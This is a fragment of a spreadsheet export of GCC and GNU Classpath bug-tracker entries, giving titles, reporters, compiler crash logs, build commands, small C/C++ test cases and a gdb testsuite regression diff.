failed build 252.eon in SPEC CPU 2000:
[hjl@gnu-16 00000001]$ /export/gnu/import/svn/gcc-test/usr/bin/gcc -DSPEC_CPU2000_LP64 -DHAS_ERRLIST    -I. -DNDEBUG     -O2 -ffast-math   mrCoarsePixelRenderer.cc -S
In file included from ./ggIO.h:171:0
                 from ./ggAll.h:70
                 from ./mrScene.h:33
                 from ./mrCoarsePixelRenderer.h:33
                 from mrCoarsePixelRenderer.cc:33:
./ggIO.cc: In member function â€˜ggBoolean ggIO::readbody(std::ifstream* ggRaster* int ggFileType*)â€™:
./ggIO.cc:513:29: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[hjl@gnu-16 00000001]$ pwd
/export/gnu/import/svn/gcc-test/spec/2000/x86_64/spec/benchspec/CINT2000/252.eon/run/00000001
[hjl@gnu-16 00000001]$</t>
  </si>
  <si>
    <t>GCC-12388</t>
  </si>
  <si>
    <t>libgcj</t>
  </si>
  <si>
    <t>[3.4 Regression] mingw32 target fails to build libjava</t>
  </si>
  <si>
    <t>gcc 20030924 fails to build for the mingw32 target. The 20030902 version worked
ok the 20030912 version also fails to build.
$ (checkout gcc from cvs on 2003-09-24)
$ ../gcc/configure --prefix=/opt/cross-mingw32-Sep24 --target=mingw32
--host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --enable-languages=cc++java
--disable-nls --disable-debug --enable-threads=win32 --with-gcc --with-gnu-as
--with-gnu-ld --without-newlib --disable-win32-registry --disable-shared
--enable-libgcj --disable-java-awt --without-x --enable-java-gc=boehm
--disable-libgcj-debug --enable-interpreter --enable-hash-synchronization
$ make
[...]
gnu/java/net/natPlainSocketImpl.cc:349: error:
`gnu::java::net::PlainSocketImpl$SocketOutputStream' is not a class-name or
namespace-name
[more errors follow see attached output]</t>
  </si>
  <si>
    <t>brawer</t>
  </si>
  <si>
    <t>GCC-10667</t>
  </si>
  <si>
    <t>Optimizer confused when operating on floats as ints.</t>
  </si>
  <si>
    <t>The program below was built as:
  gcc -v -save-temps -O3 -c -o bug.o bug.c
$ gcc -v
Reading specs from /home/joseph/t/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2.3/specs
Configured with: ../gcc-3.2.3/configure --prefix=/home/joseph/t/gcc
Thread model: posix
gcc version 3.2.3
If I examine the assembly output I find that the compiler has completely removed the multiply.  Code for the compare is generated but the compare result may be wrong since f.x was never computed.
Release:
gcc version 3.2.3
Environment:
Linux 2.4 i686.
How-To-Repeat:
# 1 bug.c
# 1 
# 1 
# 1 bug.c
struct vector {
    float x y z w
}
int func (float f1 float f2) {
    struct vector f
    f.x = f1 * f2
    if ((*(int *) &amp;(f.x)) &gt; 0) {
        return 1
    }
    return 0
}</t>
  </si>
  <si>
    <t>jkain</t>
  </si>
  <si>
    <t>GCC-65933</t>
  </si>
  <si>
    <t>final.c:2239:8: error: 'vector_type_mode' was not declared in this scope</t>
  </si>
  <si>
    <t>In r222551 the following error occurs in stage1:
g++ -c   -g -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -
W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I/opt/gnu/gcc/gmp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc/gcc/../libbacktrace   -o final.o -MT final.o -MMD -MP -MF ./.deps/final.TPo ../../gcc/gcc/final.c
../../gcc/gcc/final.c: In function 'rtx_insn* final_scan_insn(rtx_insn* FILE* int int int*)':
../../gcc/gcc/final.c:2239:8: error: 'vector_type_mode' was not declared in this scope
../../gcc/gcc/final.c:2239:8: error: 'vector_type_mode' was not declared in this scope
make[3]: *** [final.o] Error 1</t>
  </si>
  <si>
    <t>GCC-81192</t>
  </si>
  <si>
    <t>gcc ICE at -Os on x86_64-linux-gnu: Segmentation fault</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -Os on x86_64-linux-gnu in both 32- and 64-bit modes. 
$ gcc-trunk --version
gcc-trunk (GCC) 8.0.0 20170623 (experimental) [trunk revision 249588]
$ gcc-trunk -Os abc.c
during GIMPLE pass: pre
abc.c: In function â€˜fn2â€™:
abc.c:4:6: internal compiler error: Segmentation fault
 void fn2() {
      ^~~
0xc8a4cf crash_signal
        ../../gcc/gcc/toplev.c:338
0xe56285 same_succ_flush_bb
        ../../gcc/gcc/tree-ssa-tail-merge.c:813
0xe580cb same_succ_flush_bbs
        ../../gcc/gcc/tree-ssa-tail-merge.c:828
0xe580cb update_worklist
        ../../gcc/gcc/tree-ssa-tail-merge.c:875
0xe580cb tail_merge_optimize(unsigned int)
        ../../gcc/gcc/tree-ssa-tail-merge.c:1792
0xe06bf0 execute
        ../../gcc/gcc/tree-ssa-pre.c:5162
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ cat abc.c
unsigned a
int b c
int(fn1)(int p1 int p2) { return p1 &gt; 2147483647 - p2 ? p1 : p1 + p2 }
void fn2() {
  int j
  a = 30
  for ( a)
    for ( c b = fn1(j 1))
}</t>
  </si>
  <si>
    <t>helloqirun</t>
  </si>
  <si>
    <t>GCC-71073</t>
  </si>
  <si>
    <t>debug-mode headers should include #pragma GCC system_header directives</t>
  </si>
  <si>
    <t>This change would help analysis tools cope with the code in the debug-mode headers usually by ignoring it.</t>
  </si>
  <si>
    <t>froydnj</t>
  </si>
  <si>
    <t>GCC-32581</t>
  </si>
  <si>
    <t>make profiledbootstrap - stageprofile - gcc/ada/a-except.adb:1301: error: control flow in the middle of basic block 20</t>
  </si>
  <si>
    <t>My other report mentions GNAT BUG DETECTED ada/ali.adb:2265
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=32024
Shows breakage in a different location of the build. That report was concerned with fold checking and was closed on the basis that non-profiled make was fixed.
The following bug report claims make profiledbootstrap was FIXED @ 121554 but does not mention if they built Ada and it was at latest from 20070202:
[4.3 Regression] ICE with -fprofile-use
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30650
I do not believe my search turned up any dupes and that this report is new.
One problem _might_ be that when the GNAT BUG DETECTED 'box' comes up it doesn't list files that are to be included with the report (as shown in my other bug report above http://gcc.gnu.org/bugzilla/show_bug.cgi?id=32024#c5 ).
The bug that this report is the subject of is when I do a make profiledbootstrap after configuring like this:
# prev-gcc/xgcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /root/downloads/gcc-4_3-trunk/configure --verbose --enable-languages=cadac++fortranjavaobjcobj-c++ --prefix=/usr/test --enable-objc-gc --enable-concept-checks --disable-multilib --with-gxx-include-dir=/usr/test/include/c++/4.3 --enable-libstdcxx-debug --enable-static --enable-shared --enable-initfini-array --enable-__cxa_atexit --enable-threads=posix --enable-version-specific-runtime-libs --enable-libssp --enable-libmudflap --enable-libgomp --disable-werror --enable-nls --with-included-gettext --enable-decimal-float --enable-debug --enable-java-gc=boehm --with-x --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --enable-java-awt=gtkxlib --enable-gtk-cairo --enable-qt-peer --enable-xmlj --enable-gconf-peer --enable-tool-wrappers --enable-portable-native-sync --enable-examples --with-dwarf2 --with-stabs --enable-hash-synchronization --enable-gc-debug --enable-interpreter --with-system-zlib --enable-libada --with-tls --with-tune=athlon-xp --with-cpu=athlon-xp --with-arch=athlon-xp --enable-stage1-checking=assertdffoldgcmiscrtlrtlflagruntimetree
Thread model: posix
gcc version 4.3.0 20070701 (experimental)
I get this error:
build/genchecksum cc1-dummy &gt; cc1-checksum.c
...
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... gcc/gcov.c -o gcov.o
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... gcc/errors.c -o errors.o
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... -lmpfr -lgmp -o gcov
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... gcc/gcov-dump.c -o gcov-dump.o
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... -lmpfr -lgmp -o gcov-dump
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... gcc/ada/ada.ads -o ada/ada.o
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... gcc/ada/a-charac.ads -o ada/a-charac.o
/opt/gcc-4_3-build-profile-1/prev-gcc/xgcc ... gcc/ada/a-chlat1.ads -o ada/a-chlat1.o
/opt/gcc-4_3-build-profile-1/./prev-gcc/xgcc -B/opt/gcc-4_3-build-profile-1/./prev-gcc/ -B/usr/test/i686-pc-linux-gnu/bin/ -c -O2 -g -fomit-frame-pointer -fprofile-generate      -gnatpg -gnata -g -O1 -fno-inline \
         -nostdinc -I- -I. -Iada -I/root/downloads/gcc-4_3-trunk/gcc/ada /root/downloads/gcc-4_3-trunk/gcc/ada/a-except.adb -o ada/a-except.o
/root/downloads/gcc-4_3-trunk/gcc/ada/a-except.adb: In function 'Ada.Exceptions.Raise_From_Controlled_Operation':
/root/downloads/gcc-4_3-trunk/gcc/ada/a-except.adb:1301: error: control flow in the middle of basic block 20
/root/downloads/gcc-4_3-trunk/gcc/ada/a-except.adb:1301: error: control flow in the middle of basic block 20
/root/downloads/gcc-4_3-trunk/gcc/ada/a-except.adb:1301: error: control flow in the middle of basic block 20
/root/downloads/gcc-4_3-trunk/gcc/ada/a-except.adb:1301: error: control flow in the middle of basic block 20
/root/downloads/gcc-4_3-trunk/gcc/ada/a-except.adb:1301: error: control flow in the middle of basic block 20
+===========================GNAT BUG DETECTED==============================+
| 4.3.0 20070701 (experimental) (i686-pc-linux-gnu) verify_flow_info failed|
| Error detected at a-except.adb:1301:1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raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:399
make[3]: *** [ada/a-except.o] Error 1
make[3]: Leaving directory `/opt/gcc-4_3-build-profile-1/gcc'
make[2]: *** [all-stageprofile-gcc] Error 2
make[2]: Leaving directory `/opt/gcc-4_3-build-profile-1'
make[1]: *** [stageprofile-bubble] Error 2
make[1]: Leaving directory `/opt/gcc-4_3-build-profile-1'
make: *** [profiledbootstrap] Error 2
Note that it says Please include these source files with error report but
there are no files listed.
The subject of this report is not that fault but that I can not use make profiledbootstrap with all languages enabled. I'll strip Ada off the list and
see if I can re-start the build without a make clean.
The reason I don't want to type make clean is that each file over 700K takes a while with profiling on and a few are over a meg thus quite slow.
The worst is this:
ls -lrtA /opt/gcc-4_3-build-profile-1/gcc/
...
-rw-r--r-- 1 root root       10 Jul  1 22:07 s-attrtab
-rw-r--r-- 1 root root  3183312 Jul  1 22:07 insn-attrtab.c
-rw-r--r-- 1 root root       10 Jul  1 22:07 s-attr
-rw-r--r-- 1 root root     7897 Jul  1 22:07 insn-attr.h
-rw-r--r-- 1 root root  3194208 Jul  1 22:26 insn-attrtab.gcno
-rw-r--r-- 1 root root  2422496 Jul  1 22:26 insn-attrtab.o
-rw-r--r-- 1 root root       10 Jul  1 22:28 s-automata
-rw-r--r-- 1 root root   712157 Jul  1 22:28 insn-automata.c
...
I had a look at the generated file insn-attrtab.c and it would be possible to break it into three pieces (at least). Another offender is insn-recog.c which
might be harder to find a good spot to split it.
The file fold-const.c is not generated and could be split. I might be where the above problem is. It takes 10 minutes to compile (on a fast computer).
The 35 minutes spent compiling those three files might be better spent splitting them up. Then they would compile fast enough to get your time
back for the effort expended _if_ you only had to compile it once.</t>
  </si>
  <si>
    <t>rob1weld</t>
  </si>
  <si>
    <t>CLASSPATH-24678</t>
  </si>
  <si>
    <t>The checkboxes and radio buttons are only seen in the Ocean L&amp;F</t>
  </si>
  <si>
    <t>The checkboxes and radio buttons are not visible in both default MetalLookAndFeel and GnuLookAndFeel. The bug can be observed in our Swing Activity Board. Both checkboxes and radio buttons are visible in the MetalLookAndFeel (Ocean) so probably this is the same bug in both cases.
Observed with JamVM 1.3.3</t>
  </si>
  <si>
    <t>langel</t>
  </si>
  <si>
    <t>audriusa</t>
  </si>
  <si>
    <t>GCC-6643</t>
  </si>
  <si>
    <t>gcc fails in tree check for assignment to variable sized array</t>
  </si>
  <si>
    <t>Given this test case:
void foo (unsigned int len)
{
    char str[len]
    str[0] = '\0'
}
gcc with checking enabled fails with:
t.c: In function `foo':
t.c:5: tree check: expected integer_cst have plus_expr in tree_int_cst_sgn at tree.c:3513
Release:
3.1 20020506
Environment:
axp-suse-linux</t>
  </si>
  <si>
    <t>pthomas</t>
  </si>
  <si>
    <t>GCC-68222</t>
  </si>
  <si>
    <t>_Safe_iterator provides operators the wrapped iterator can't actually support</t>
  </si>
  <si>
    <t>It would be very helpful if the _Safe_iterator wrapper disabled operators such as non-member operator-() that aren't actually supported by the wrapped iterator type. Since the non-member operator-() is well formed modern iterator  code might reasonably choose to enable code that uses it but this will result in a compile error. One example of this cropping up:
https://github.com/ericniebler/range-v3/issues/231
This issue is illustrated in the following code:
// Turn debug mode on
#define _GLIBCXX_DEBUG
#include 
#include 
template  void ignore_unused(const Ts 
int main() {
	// A list of int
	const std::list nums = { 1 2 3 4 }
	// Grab the iterator type (which is _Safe_iterator list &gt;)
	using list_itr_type = decltype( std::cbegin( nums ) )
	// TD bob
	// Confirm cend returns the same type
	static_assert( std::is_same::value  )
	// The list's iterator type provides a well-formed non-member operator-() with valid return type (long int)
	using subtraction_return_type = decltype( std::declval() - std::declval() )
	static_assert( std::is_same::value  )
	// Yet an attempt to actually fails to compile because the wrapped list iterator
	// doesn't support operator-()
	const auto fail_here = std::cend( nums ) - std::begin( nums )
	ignore_unused( fail_here )
	return 0
}
// Command : g++ -std=c++14 -Wall -Wextra -fno-strict-aliasing -fwrapv -fno-aggressive-loop-optimizations safe_itr_prob.cpp
// STL     : GNU libstdc++ version 20151010 ( /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 )
// Compiler: GNU C++ version 5.2.1 20151010
// OS      : Ubuntu 15.10 (Linux 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:35:06 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux)</t>
  </si>
  <si>
    <t>fdumont</t>
  </si>
  <si>
    <t>TonyELewis</t>
  </si>
  <si>
    <t>GCC-38708</t>
  </si>
  <si>
    <t>[4.4 Regression] Revision 137646 caused gcc.c-torture/execute/memset-[23].c fail with -mtune=pentiumpro</t>
  </si>
  <si>
    <t>I think this is the cause of PR 38686 but I could be wrong.
Anyways gcc.c-torture/execute/memset-3.c   fails with -march=pentium-m -O1</t>
  </si>
  <si>
    <t>GCC-68523</t>
  </si>
  <si>
    <t>CFG Expansion Computes Incorrect Block Frequencies for Nested Loops</t>
  </si>
  <si>
    <t>With a debug version of gcc compile the following program with the command-line options:
    -S -O3 -fno-tree-vectorize -da
void foo(double *d unsigned long int n) {
  unsigned long int i j
  for (j = 0 j &lt; 10000002 j++) {
    for (i=0i&lt;ni++) {
      d[i*2] =  0.0
    }
  }
}
Note that the outer-loop iteration count is a compile-time constant and the inner-nested loop's iteration count is determined at run time.
The dump file with .expand file name extension that is produced by the gcc compiler represents the inner-nested loop as block B5 and the outer-nested loop as blocks B7 B5 and B6.
As reported by the dump file the complete function following control-flow graph expansion is represented by the following control-flow graph:
ENTRY:9 -&gt; B2(100%)
B2:9 -&gt; B4(100%)
B4:9 -&gt; B7(100%)
B7:900 -&gt; B5(100%)
B5:9100 -&gt; B5(91%) B6(9%)
B6:900 -&gt; B7(99%) B9(1%)
B9:9 -&gt; EXIT(100%)
EXIT:9
There are several inconsistencies in the reported frequencies.
Note that the predecessors of B5 have combined frequency 900 + 91% of 9100 = 900 + 8281 = 9181 which does not equal the frequency of B5 (9100).
Also note that predecessors of B6 have combined frequency 9% of 9100 = 819 which does not equal 900 the frequency of B6.
To correct the error block B5 should have frequency 10000.  The value 10000 can be computed by dividing 900 the combined frequency of edges entering this run-time bounded loop by 0.09.  Dividing by this magic number 0.09 corresponds to the heuristic that each conditional exit from a loop whose iteration bounds are determined at run-time has probability 9% of exiting the loop and 91% of remaining inside the loop.</t>
  </si>
  <si>
    <t>kelvin</t>
  </si>
  <si>
    <t>GCC-13461</t>
  </si>
  <si>
    <t>Fails to access protected-ctor from public constant</t>
  </si>
  <si>
    <t>The following code compiles in all versions of g++ 3.2 and earlier that I 
tested. AFAIK this is legal C++ (unless I have missed some ru</t>
  </si>
  <si>
    <t>ysbeer</t>
  </si>
  <si>
    <t>GCC-39267</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] gdb testsuite regressions</t>
  </si>
  <si>
    <t>We seem to regress in gdb testsuite relative to gcc-4.1.0:
@@ -36227 +36227 @@                                                                                                                                                  
 PASS: gdb.base/maint.exp: maint internal-error                                                                                                                        
 PASS: gdb.base/maint.exp: internal-error resync                                                                                                                       
 Running ../../../gdb/testsuite/gdb.base/mips_pro.exp ...                                                                                                              
-PASS: gdb.base/mips_pro.exp: backtrace                                                                                                                                
+FAIL: gdb.base/mips_pro.exp: running to middle in runto                                                                                                               
 Running ../../../gdb/testsuite/gdb.base/miscexprs.exp ...                                                                                                             
 PASS: gdb.base/miscexprs.exp: up from marker1                                                                                                                         
 PASS: gdb.base/miscexprs.exp: print value of &amp;ibig.i[0]                                                                                                               
@@ -36497 +36497 @@                                                                                                                                                  
 PASS: gdb.base/miscexprs.exp: print value of lbig.l[333] &gt;&gt; 6                                                                                                         
 Running ../../../gdb/testsuite/gdb.base/multi-forks.exp ...                                                                                                           
 PASS: gdb.base/multi-forks.exp: Break at exit                                                                                                                         
-FAIL: gdb.base/multi-forks.exp: follow child print pids (timeout)                                                                                                    
+PASS: gdb.base/multi-forks.exp: follow child print pids                                                                                                              
 PASS: gdb.base/multi-forks.exp: Break at exit                                                                                                                         
 PASS: gdb.base/multi-forks.exp: follow parent print pids                                                                                                             
 PASS: gdb.base/multi-forks.exp: help set detach                                                                                                                       
@@ -634935 +634935 @@                                                                                                                                                
 PASS: gdb.base/store.exp: tbreak add_charest                                                                                                                          
 PASS: gdb.base/store.exp: continue to add_charest                                                                                                                     
 PASS: gdb.base/store.exp: upvar charest l up                                                                                                                         
-PASS: gdb.base/store.exp: upvar charest l print old l expecting -1 .*                                                                                               
+FAIL: gdb.base/store.exp: upvar charest l print old l expecting -1 .*                                                                                               
 PASS: gdb.base/store.exp: upvar charest l print old r expecting -2 .*                                                                                               
 PASS: gdb.base/store.exp: upvar charest l set l to 4                                                                                                                 
 PASS: gdb.base/store.exp: upvar charest l print new l expecting 4 ..004.                                                                                            
 PASS: gdb.base/store.exp: tbreak add_short                                                                                                                            
 PASS: gdb.base/store.exp: continue to add_short                                                                                                                       
 PASS: gdb.base/store.exp: upvar short l up                                                                                                                           
-PASS: gdb.base/store.exp: upvar short l print old l expecting -1                                                                                                    
+FAIL: gdb.base/store.exp: upvar short l print old l expecting -1                                                                                                    
 PASS: gdb.base/store.exp: upvar short l print old r expecting -2                                                                                                    
 PASS: gdb.base/store.exp: upvar short l set l to 4                                                                                                                   
 PASS: gdb.base/store.exp: upvar short l print new l expecting 4                                                                                                     
 PASS: gdb.base/store.exp: tbreak add_int                                                                                                                              
 PASS: gdb.base/store.exp: continue to add_int                                                                                                                         
 PASS: gdb.base/store.exp: upvar int l up                                                                                                                             
-PASS: gdb.base/store.exp: upvar int l print old l expecting -1                                                                                                      
+FAIL: gdb.base/store.exp: upvar int l print old l expecting -1                                                                                                      
 PASS: gdb.base/store.exp: upvar int l print old r expecting -2                                                                                                      
 PASS: gdb.base/store.exp: upvar int l set l to 4                                                                                                                     
 PASS: gdb.base/store.exp: upvar int l print new l expecting 4                                                                                                       
 PASS: gdb.base/store.exp: tbreak add_long                                                                                                                             
 PASS: gdb.base/store.exp: continue to add_long                                                                                                                        
 PASS: gdb.base/store.exp: upvar long l up                                                                                                                            
-PASS: gdb.base/store.exp: upvar long l print old l expecting -1                                                                                                     
+FAIL: gdb.base/store.exp: upvar long l print old l expecting -1                                                                                                     
 PASS: gdb.base/store.exp: upvar long l print old r expecting -2                                                                                                     
 PASS: gdb.base/store.exp: upvar long l set l to 4                                                                                                                    
 PASS: gdb.base/store.exp: upvar long l print new l expecting 4                                                                                                      
 PASS: gdb.base/store.exp: tbreak add_longest                                                                                                                          
 PASS: gdb.base/store.exp: continue to add_longest                                                                                                                     
 PASS: gdb.base/store.exp: upvar longest l up                                                                                                                         
-PASS: gdb.base/store.exp: upvar longest l print old l expecting -1                                                                                                  
+FAIL: gdb.base/store.exp: upvar longest l print old l expecting -1                                                                                                  
 PASS: gdb.base/store.exp: upvar longest l print old r expecting -2                                                                                                  
 PASS: gdb.base/store.exp: upvar longest l set l to 4                                                                                                                 
 PASS: gdb.base/store.exp: upvar longest l print new l expecting 4                                                                                                   
@@ -63987 +63987 @@                                                                                                                                                  
 PASS: gdb.base/store.exp: tbreak add_doublest                                                                                                                         
 PASS: gdb.base/store.exp: continue to add_doublest                                                                                                                    
 PASS: gdb.base/store.exp: upvar doublest l up                                                                                                                        
-PASS: gdb.base/store.exp: upvar doublest l print old l expecting -1                                                                                                 
+FAIL: gdb.base/store.exp: upvar doublest l print old l expecting -1                                                                                                 
 PASS: gdb.base/store.exp: upvar doublest l print old r expecting -2                                                                                                 
 PASS: gdb.base/store.exp: upvar doublest l set l to 4                                                                                                                
 PASS: gdb.base/store.exp: upvar doublest l print new l expecting 4                                                                                                  
@@ -74157 +74157 @@                                                                                                                                                  
 PASS: gdb.cp/annota2.exp: run until main breakpoint                                                                                                                   
 PASS: gdb.cp/annota2.exp: set watch on a.x                                                                                                                            
 KFAIL: gdb.cp/annota2.exp: watch triggered on a.x (PRMS: gdb/38)                                                                                                      
-KFAIL: gdb.cp/annota2.exp: annotate-quit (PRMS: gdb/544)                                                                                                              
+PASS: gdb.cp/annota2.exp: annotate-quit                                                                                                                               
 Running ../../../gdb/testsuite/gdb.cp/annota3.exp ...                                                                                                                 
 PASS: gdb.cp/annota3.exp: breakpoint main                                                                                                                             
 PASS: gdb.cp/annota3.exp: annotation set at level 3                                                                                                                   
@@ -74277 +74277 @@                                                                                                                                                  
 PASS: gdb.cp/annota3.exp: second run until main breakpoint                                                                                                            
 PASS: gdb.cp/annota3.exp: set watch on a.x                                                                                                                            
 KFAIL: gdb.cp/annota3.exp: watch triggered on a.x (PRMS: gdb/38)                                                                                                      
-FAIL: gdb.cp/annota3.exp: annotate-quit (pattern 1)                                                                                                                   
+PASS: gdb.cp/annota3.exp: annotate-quit                                                                                                                               
 Running ../../../gdb/testsuite/gdb.cp/anon-union.exp ...                                                                                                              
 PASS: gdb.cp/anon-union.exp: next 1                                                                                                                                   
 PASS: gdb.cp/anon-union.exp: print foo 1                                                                                                                              
@@ -75489 +75489 @@                                                                                                                                                  
 PASS: gdb.cp/classes.exp: continue to enums2(\(\)|)                                                                                                                   
 PASS: gdb.cp/classes.exp: print obj_with_enum (1)                                                                                                                     
 PASS: gdb.cp/classes.exp: next                                                                                                                                        
-PASS: gdb.cp/classes.exp: print obj_with_enum (2)                                                                                                                     
-PASS: gdb.cp/classes.exp: print obj_with_enum.priv_enum                                                                                                               
-PASS: gdb.cp/classes.exp: ptype obj_with_enum.priv_enum                                                                                                               
+FAIL: gdb.cp/classes.exp: print obj_with_enum (2)                                                                                                                     
+FAIL: gdb.cp/classes.exp: print obj_with_enum.priv_enum                                                                                                               
+FAIL: gdb.cp/classes.exp: ptype obj_with_enum.priv_enum                                                                                                               
 KFAIL: gdb.cp/classes.exp: ptype obj_with_enum // unrecognized line type 1: PrivEnum priv_enum (PRMS: gdb/57)                                                        
 KFAIL: gdb.cp/classes.exp: print (ClassWithEnum::PrivEnum) 42 (PRMS: gdb/1588)                                                                                        
 KFAIL: gdb.cp/classes.exp: print ('ClassWithEnum::PrivEnum') 42 (PRMS: gdb/57)                                                                                        
@@ -75717 +75717 @@                                                                                                                                                  
@@ -75717 +75717 @@                                                                                                                                                  
 PASS: gdb.cp/classes.exp: print csi with static members                                                                                                               
 PASS: gdb.cp/classes.exp: print cnsi with static members                                                                                                              
 PASS: gdb.cp/classes.exp: finish from marker_reg1                                                                                                                     
-PASS: gdb.cp/classes.exp: calling method for small class                                                                                                              
+XFAIL: gdb.cp/classes.exp: calling method for small class (PRMS 2972)                                                                                                 
 Running ../../../gdb/testsuite/gdb.cp/cplusfuncs.exp ...                                                                                                              
 PASS: gdb.cp/cplusfuncs.exp: detect dm_operator_comma                                                                                                                 
 PASS: gdb.cp/cplusfuncs.exp: detect dm_type_char_star                                                                                                                 
@@ -86257 +86257 @@                                                                                                                                                  
 PASS: gdb.cp/inherit.exp: ptype class C                                                                                                                               
 PASS: gdb.cp/inherit.exp: ptype g_C                                                                                                                                   
 FAIL: gdb.cp/inherit.exp: ptype tagless struct                                                                                                                        
-PASS: gdb.cp/inherit.exp: ptype variable of type tagless struct                                                                                                       
+FAIL: gdb.cp/inherit.exp: ptype variable of type tagless struct                                                                                                       
 PASS: gdb.cp/inherit.exp: ptype D                                                                                                                                     
 PASS: gdb.cp/inherit.exp: ptype class D                                                                                                                               
 PASS: gdb.cp/inherit.exp: ptype g_D                                                                                                                                   
@@ -87317 +87317 @@                                                                                                                                                  
 PASS: gdb.cp/inherit.exp: print g_E                                                                                                                                   
 PASS: gdb.cp/inherit.exp: print anonymous union member                                                                                                                
 PASS: gdb.cp/inherit.exp: print variable of type anonymous union                                                                                                      
-FAIL: gdb.cp/inherit.exp: print type of anonymous union // unrecognized line type 1: class_with_anon_union::._0                                                      
+FAIL: gdb.cp/inherit.exp: print type of anonymous union // unrecognized line type 1: class_with_anon_union::                                        
 PASS: gdb.cp/inherit.exp: print g_vA.vA::va                                                                                                                           
 PASS: gdb.cp/inherit.exp: print g_vA.vA::vx                                                                                                                           
 PASS: gdb.cp/inherit.exp: print g_vA.va                                                                                                                               
@@ -878917 +878917 @@                                                                                                                                                
 PASS: gdb.cp/m-data.exp: simple object const bool                                                                                                                    
 PASS: gdb.cp/m-data.exp: simple object const int                                                                                                                     
 PASS: gdb.cp/m-data.exp: simple object long                                                                                                                          
-PASS: gdb.cp/m-data.exp: simple object enum                                                                                                                          
+FAIL: gdb.cp/m-data.exp: simple object enum                                                                                                                          
 PASS: gdb.cp/m-data.exp: derived template object base const bool                                                                                                     
 PASS: gdb.cp/m-data.exp: derived template object base const int                                                                                                      
 PASS: gdb.cp/m-data.exp: derived template object base long                                                                                                           
 PASS: gdb.cp/m-data.exp: derived template object base enum                                                                                                           
-PASS: gdb.cp/m-data.exp: derived template object derived enum                                                                                                        
+FAIL: gdb.cp/m-data.exp: derived template object derived enum                                                                                                        
 PASS: gdb.cp/m-data.exp: template object const bool                                                                                                                  
 PASS: gdb.cp/m-data.exp: template object const int                                                                                                                   
 PASS: gdb.cp/m-data.exp: template object long                                                                                                                        
 PASS: gdb.cp/m-data.exp: template object base enum                                                                                                                   
-PASS: gdb.cp/m-data.exp: template object derived enum                                                                                                                
+FAIL: gdb.cp/m-data.exp: template object derived enum                                                                                                                
 PASS: gdb.cp/m-data.exp: continue to breakpoint: continue to shadow breakpoint                                                                                        
 PASS: gdb.cp/m-data.exp: shadowing member                                                                                                                             
 PASS: gdb.cp/m-data.exp: shadowed global variable                                                                                                                     
@@ -881312 +881312 @@                                                                                                                                                
 PASS: gdb.cp/m-static.exp: derived template object base static const int                                                                                             
 PASS: gdb.cp/m-static.exp: derived template object base static long                                                                                                  
 PASS: gdb.cp/m-static.exp: derived template object base static enum                                                                                                  
-PASS: gdb.cp/m-static.exp: derived template object static enum                                                                                                       
-PASS: gdb.cp/m-static.exp: derived template object static enum                                                                                                       
+FAIL: gdb.cp/m-static.exp: derived template object static enum                                                                                                       
 PASS: gdb.cp/m-static.exp: template object static const bool                                                                                                         
 PASS: gdb.cp/m-static.exp: template object static const int                                                                                                          
 PASS: gdb.cp/m-static.exp: template object static long                                                                                                               
 PASS: gdb.cp/m-static.exp: template object static enum                                                                                                               
-PASS: gdb.cp/m-static.exp: template object static derived enum                                                                                                       
+FAIL: gdb.cp/m-static.exp: template object static derived enum                                                                                                       
 PASS: gdb.cp/m-static.exp: static const int initialized elsewhere                                                                                                     
 PASS: gdb.cp/m-static.exp: static const int initialized nowhere                                                                                                       
 Running ../../../gdb/testsuite/gdb.cp/maint.exp ...                                                                                                                   
@@ -894115 +894115 @@                                                                                                                                                
 KFAIL: gdb.cp/namespace.exp: ptype ::C::OtherFileClass (PRMS: gdb/1448)                                                                                               
 PASS: gdb.cp/namespace.exp: ptype C::OtherFileClass                                                                                                                   
 PASS: gdb.cp/namespace.exp: print cX                                                                                                                                  
-PASS: gdb.cp/namespace.exp: print 'F::cXf'                                                                                                                            
-PASS: gdb.cp/namespace.exp: print F::cXf                                                                                                                              
-PASS: gdb.cp/namespace.exp: print F::cXfX                                                                                                                             
+FAIL: gdb.cp/namespace.exp: print 'F::cXf'                                                                                                                            
+FAIL: gdb.cp/namespace.exp: print F::cXf                                                                                                                              
+FAIL: gdb.cp/namespace.exp: print F::cXfX                                                                                                                             
 PASS: gdb.cp/namespace.exp: print X                                                                                                                                   
-PASS: gdb.cp/namespace.exp: print 'G::Xg'                                                                                                                             
-PASS: gdb.cp/namespace.exp: print G::Xg                                                                                                                               
-PASS: gdb.cp/namespace.exp: print G::XgX                                                                                                                              
-PASS: gdb.cp/namespace.exp: print cXOtherFile                                                                                                                         
-PASS: gdb.cp/namespace.exp: print XOtherFile                                                                                                                          
+FAIL: gdb.cp/namespace.exp: print 'G::Xg'                                                                                                                             
+FAIL: gdb.cp/namespace.exp: print G::Xg                                                                                                                               
